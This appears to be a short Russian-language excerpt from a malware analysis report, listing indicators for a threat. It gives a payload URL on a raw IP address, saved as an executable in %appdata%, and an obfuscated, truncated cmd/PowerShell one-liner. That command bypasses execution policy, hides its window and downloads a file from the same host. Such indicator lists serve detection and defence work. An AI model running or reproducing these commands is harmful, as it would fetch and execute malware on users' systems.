Техническая информация
- http://185.165.31.75:801/encrypted.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^W^eR^S^H^E^ll.eXE -^eXe^c^UT^I^O^nP^OlICy^ bY^P^ASS -n^Op^RO^F^i^L^e -^w^in^dO^ws^t^y^lE h^ID^DE^N (ne^w^-OB^JecT s^Y^s^Tem.NET^.^wE^Bcl^I^E^nt).^D^OWn^L^o^A^dFilE('http://18...
- '18#.#65.31.75':801
- '<SYSTEM32>\cmd.exe' /C "PO^W^eR^S^H^E^ll.eXE -^eXe^c^UT^I^O^nP^OlICy^ bY^P^ASS -n^Op^RO^F^i^L^e -^w^in^dO^ws^t^y^lE h^ID^DE^N (ne^w^-OB^JecT s^Y^s^Tem.NET^.^wE^Bcl^I^E^nt).^D^OWn^L^o^A^dFilE('http://18...' (со скрытым окном)